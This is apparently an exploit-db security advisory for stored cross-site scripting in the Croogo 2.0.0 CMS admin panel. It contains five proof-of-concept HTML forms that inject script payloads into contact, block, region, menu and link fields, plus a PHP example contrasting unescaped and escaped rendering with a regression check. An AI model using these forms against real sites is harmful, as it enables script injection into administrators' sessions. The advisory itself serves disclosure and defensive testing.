Croogo 2.0.0 – Multiple Persistent Cross-Site Scripting Vulnerabilities

  • Author: LiquidWorm
    Date: 2014-10-14
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/34959/
  • <<<
    
    Croogo 2.0.0 Multiple Stored XSS Vulnerabilities
    
    
    Vendor: Fahad Ibnay Heylaal
    Product web page: http://www.croogo.org
    Affected version: 2.0.0
    
    Summary: Croogo is a free, open source, content management system
    for PHP, released under The MIT License. It is powered by CakePHP
    MVC framework.
    
    Desc: Croogo version 2.0.0 suffers from multiple stored cross-site
    scripting vulnerabilities. Input passed to several POST parameters of
    the admin interface (contact, block, region, menu and link titles and
    aliases) is saved without sanitisation and is not HTML-encoded when it
    is later rendered back to the user. This can be exploited to persist
    arbitrary HTML and script code that executes in the browser session of
    any user who views the affected page, in the context of the affected site.
    
    Note on the PoC forms below: they are verbatim Burp captures, so the
    data[_Token][key] and data[_Token][fields] values are CakePHP
    SecurityComponent tokens bound to the session in which they were
    recorded. They will be rejected if replayed as-is and must be captured
    again from a live session of the target.
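
    The following PHP script is an added illustration, not Croogo's own code
    and not part of the advisory: it models the stored-XSS pattern described
    above by rendering a saved title into an admin view once without output
    encoding and once through htmlspecialchars(), which is what CakePHP's h()
    helper wraps. The sample rows, the template markup and the function names
    are constructed for the example; the payload strings are the ones used in
    the PoC forms further down.

```php
<?php
// Added example (not Croogo's code): vulnerable vs. hardened rendering of a
// stored value, plus a regression check that parses the output for injected
// markup. Rows, markup and helper names are constructed for this example.

declare(strict_types=1);

// Constructed sample records carrying the advisory's payloads plus one benign control.
$rows = [
    ['model' => 'Contact', 'field' => 'title', 'value' => '"><script>alert("XSS");</script>'],
    ['model' => 'Block',   'field' => 'title', 'value' => '"><script>alert(2);</script>'],
    ['model' => 'Block',   'field' => 'alias', 'value' => '"><script>alert(3);</script>'],
    ['model' => 'Menu',    'field' => 'alias', 'value' => 'main-menu'],
];

/**
 * Vulnerable pattern: the stored value is concatenated straight into an
 * attribute and into element text. A value beginning with `">` closes the
 * attribute and the tag, so the trailing <script> is parsed as markup.
 */
function render_unescaped(string $value): string
{
    return '<input type="text" name="data[Block][title]" value="' . $value . '" />'
         . '<h2 class="title">' . $value . '</h2>';
}

/**
 * Hardened pattern: every stored value goes through an HTML encoder before
 * it reaches the page. ENT_QUOTES encodes both quote characters so the value
 * can never close an attribute; ENT_SUBSTITUTE keeps invalid UTF-8 from
 * silently turning the whole string into "". CakePHP's h() helper is a thin
 * wrapper around this call.
 */
function esc(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_escaped(string $value): string
{
    return '<input type="text" name="data[Block][title]" value="' . esc($value) . '" />'
         . '<h2 class="title">' . esc($value) . '</h2>';
}

/**
 * Regression check for a stored-XSS fix: parse the rendered fragment the way
 * a browser would and report whether the payload survived as markup. The
 * template emits exactly one <input> and one <h2>; any <script> element or
 * any extra element means the stored value broke out of its context.
 */
function contains_injected_markup(string $html): bool
{
    $doc = new DOMDocument();
    libxml_use_internal_errors(true);
    $doc->loadHTML('<!DOCTYPE html><html><body>' . $html . '</body></html>');
    libxml_clear_errors();

    if ($doc->getElementsByTagName('script')->length > 0) {
        return true;
    }
    $elements = 0;
    foreach ($doc->getElementsByTagName('body')->item(0)->childNodes as $node) {
        if ($node->nodeType === XML_ELEMENT_NODE) {
            $elements++;
        }
    }
    return $elements !== 2;
}

foreach ($rows as $row) {
    $label = sprintf('%s.%s', $row['model'], $row['field']);
    $vuln  = render_unescaped($row['value']);
    $safe  = render_escaped($row['value']);
    printf("%-14s unescaped: %s\n", $label, contains_injected_markup($vuln) ? 'INJECTED' : 'clean');
    printf("%-14s escaped:   %s\n", $label, contains_injected_markup($safe) ? 'INJECTED' : 'clean');
}
```

    Run with `php example.php`; the three payload rows report INJECTED for
    the unescaped renderer and clean for the escaped one, while the benign
    alias is clean in both. The same DOMDocument check can be pointed at the
    real admin pages (contacts, blocks, regions, menus, links) after a fix to
    confirm the stored values are no longer emitted as markup.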
    
    Tested on: Apache/2.4.7 (Win32)
               PHP/5.5.6
               MySQL 5.6.14
    
    
    Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
    Zero Science Lab - http://www.zeroscience.mk
    Macedonian Information Security Research And Development Laboratory
    
    
    Advisory ID: ZSL-2014-5201
    Advisory URL: http://zeroscience.mk/en/vulnerabilities/ZSL-2014-5201.php
    
    Vendor: http://blog.croogo.org/blog/croogo-210-released
    
    
    26.07.2014
    
    >>>
    
    
    ------------------------
    (XSS #1)
    --------
    POST parameters:
    
     - data[Contact][title]
    ------------------------
    
    <html>
    <!-- PoC - generated by Burp Suite Professional -->
    <body>
    <form action="http://localhost/croogo/admin/contacts/contacts/add" method="POST">
    <input type="hidden" name="_method" value="POST" />
    <input type="hidden" name="data[_Token][key]" value="2627e9e204ad6b878dbaf1c08d830c3e744d7e6e" />
    <input type="hidden" name="data[Contact][id]" value="" />
    <!-- payload HTML-encoded so the browser submits the literal string "><script>alert("XSS");</script> -->
    <input type="hidden" name="data[Contact][title]" value="&quot;&gt;&lt;script&gt;alert(&quot;XSS&quot;);&lt;/script&gt;" />
    <input type="hidden" name="data[Contact][alias]" value="test" />
    <input type="hidden" name="data[Contact][email]" value="a@a.com" />
    <input type="hidden" name="data[Contact][body]" value="" />
    <input type="hidden" name="data[Contact][name]" value="" />
    <input type="hidden" name="data[Contact][position]" value="" />
    <input type="hidden" name="data[Contact][address]" value="" />
    <input type="hidden" name="data[Contact][address2]" value="" />
    <input type="hidden" name="data[Contact][state]" value="" />
    <input type="hidden" name="data[Contact][country]" value="" />
    <input type="hidden" name="data[Contact][postcode]" value="" />
    <input type="hidden" name="data[Contact][phone]" value="" />
    <input type="hidden" name="data[Contact][fax]" value="" />
    <input type="hidden" name="data[Contact][message_status]" value="0" />
    <input type="hidden" name="data[Contact][message_archive]" value="0" />
    <input type="hidden" name="data[Contact][message_notify]" value="0" />
    <input type="hidden" name="data[Contact][message_spam_protection]" value="0" />
    <input type="hidden" name="data[Contact][message_captcha]" value="0" />
    <input type="hidden" name="data[Contact][status]" value="0" />
    <input type="hidden" name="data[_Token][fields]" value="262e37f00fdd538ab98d168114e8befb72ba27ff%3AContact.id" />
    <input type="hidden" name="data[_Token][unlocked]" value="apply" />
    <input type="submit" value="Submit form" />
    </form>
    </body>
    </html>
    
    
    ------------------------
    (XSS #2)
    --------
    POST/PUT parameters:
    
     - data[Block][title]
     - data[Block][alias]
    ------------------------
    
    <html>
    <!-- PoC - generated by Burp Suite Professional -->
    <body>
    <form action="http://localhost/croogo/admin/blocks/blocks/edit/10" method="POST">
    <input type="hidden" name="_method" value="PUT" />
    <input type="hidden" name="data[_Token][key]" value="bb5e47ab63281908e9783d9a20f66b7f56c573f3" />
    <input type="hidden" name="data[Block][id]" value="10" />
    <!-- payloads HTML-encoded so the browser submits the literal strings "><script>alert(2);</script> and "><script>alert(3);</script> -->
    <input type="hidden" name="data[Block][title]" value="&quot;&gt;&lt;script&gt;alert(2);&lt;/script&gt;" />
    <input type="hidden" name="data[Block][alias]" value="&quot;&gt;&lt;script&gt;alert(3);&lt;/script&gt;" />
    <input type="hidden" name="data[Block][region_id]" value="3" />
    <input type="hidden" name="data[Block][body]" value="1" />
    <input type="hidden" name="data[Block][class]" value="1" />
    <input type="hidden" name="data[Block][element]" value="1" />
    <input type="hidden" name="data[Role][Role]" value="" />
    <input type="hidden" name="data[Block][visibility_paths]" value="" />
    <input type="hidden" name="data[Block][params]" value="1" />
    <input type="hidden" name="data[Block][status]" value="1" />
    <input type="hidden" name="data[Block][show_title]" value="0" />
    <input type="hidden" name="data[Block][show_title]" value="1" />
    <input type="hidden" name="data[Block][publish_start]" value="0000-00-00 00:00:00" />
    <input type="hidden" name="data[Block][publish_end]" value="0000-00-00 00:00:00" />
    <input type="hidden" name="data[_Token][fields]" value="546f4a46648b8b32ea4c2b43a4a118ea7087e21b%3ABlock.id" />
    <input type="hidden" name="data[_Token][unlocked]" value="apply" />
    <input type="submit" value="Submit form" />
    </form>
    </body>
    </html>
    
    
    ------------------------
    (XSS #3)
    --------
    POST parameters:
    
     - data[Region][title]
    ------------------------
    
    <html>
    <!-- PoC - generated by Burp Suite Professional -->
    <body>
    <form action="http://localhost/croogo/admin/blocks/regions/add" method="POST">
    <input type="hidden" name="_method" value="POST" />
    <input type="hidden" name="data[_Token][key]" value="a7d62c8c34e2a6414c3657c43790645dfdd63735" />
    <input type="hidden" name="data[Region][id]" value="" />
    <!-- payload HTML-encoded so the browser submits the literal string "><script>alert(11);</script> -->
    <input type="hidden" name="data[Region][title]" value="&quot;&gt;&lt;script&gt;alert(11);&lt;/script&gt;" />
    <input type="hidden" name="data[Region][alias]" value="1" />
    <input type="hidden" name="data[_Token][fields]" value="4020bcbfbf5ba648b159ec8a4e166f53c1b58aa4%3ARegion.id" />
    <input type="hidden" name="data[_Token][unlocked]" value="apply" />
    <input type="submit" value="Submit form" />
    </form>
    </body>
    </html>
    
    
    ------------------------
    (XSS #4)
    --------
    POST parameters:
    
     - data[Menu][title]
     - data[Menu][alias]
    ------------------------
    
    <html>
    <!-- PoC - generated by Burp Suite Professional -->
    <body>
    <form action="http://localhost/croogo/admin/menus/menus/add" method="POST">
    <input type="hidden" name="_method" value="POST" />
    <input type="hidden" name="data[_Token][key]" value="253c5c67942b2d126c886c9ac7a62ebf065cf42b" />
    <input type="hidden" name="data[Menu][id]" value="" />
    <!-- payloads HTML-encoded so the browser submits the literal strings "><script>alert(22);</script> and "><script>alert(33);</script> -->
    <input type="hidden" name="data[Menu][title]" value="&quot;&gt;&lt;script&gt;alert(22);&lt;/script&gt;" />
    <input type="hidden" name="data[Menu][alias]" value="&quot;&gt;&lt;script&gt;alert(33);&lt;/script&gt;" />
    <input type="hidden" name="data[Menu][description]" value="ZSL" />
    <input type="hidden" name="data[Menu][params]" value="1" />
    <input type="hidden" name="data[Menu][status]" value="1" />
    <input type="hidden" name="data[Menu][publish_start]" value="1" />
    <input type="hidden" name="data[Menu][publish_end]" value="1" />
    <input type="hidden" name="data[_Token][fields]" value="58685dc7a49f7617cffaa3a00ec4245516c5f9d3%3AMenu.id" />
    <input type="hidden" name="data[_Token][unlocked]" value="apply" />
    <input type="submit" value="Submit form" />
    </form>
    </body>
    </html>
    
    
    ------------------------
    (XSS #5)
    --------
    POST parameters:
    
     - data[Link][title]
    ------------------------
    
    <html>
    <!-- PoC - generated by Burp Suite Professional -->
    <body>
    <form action="http://localhost/croogo/admin/menus/links/add/menu:6" method="POST">
    <input type="hidden" name="_method" value="POST" />
    <input type="hidden" name="data[_Token][key]" value="736e7539497307010b8cb8e70c44ec8a9798d0fb" />
    <input type="hidden" name="data[Link][id]" value="" />
    <input type="hidden" name="data[Link][menu_id]" value="6" />
    <input type="hidden" name="data[Link][parent_id]" value="" />
    <!-- payload HTML-encoded so the browser submits the literal string "><script>alert(1);</script> -->
    <input type="hidden" name="data[Link][title]" value="&quot;&gt;&lt;script&gt;alert(1);&lt;/script&gt;" />
    <input type="hidden" name="data[Link][link]" value="1" />
    <input type="hidden" name="data[Role][Role]" value="" />
    <input type="hidden" name="data[Link][class]" value="scriptalert1script" />
    <input type="hidden" name="data[Link][description]" value="" />
    <input type="hidden" name="data[Link][rel]" value="" />
    <input type="hidden" name="data[Link][target]" value="" />
    <input type="hidden" name="data[Link][params]" value="" />
    <input type="hidden" name="data[Link][status]" value="0" />
    <input type="hidden" name="data[Link][publish_start]" value="" />
    <input type="hidden" name="data[Link][publish_end]" value="" />
    <input type="hidden" name="data[_Token][fields]" value="d662745abb348c763337f58c8c3c28bb1e8c014f%3ALink.id" />
    <input type="hidden" name="data[_Token][unlocked]" value="apply" />
    <input type="submit" value="Submit form" />
    </form>
    </body>
    </html>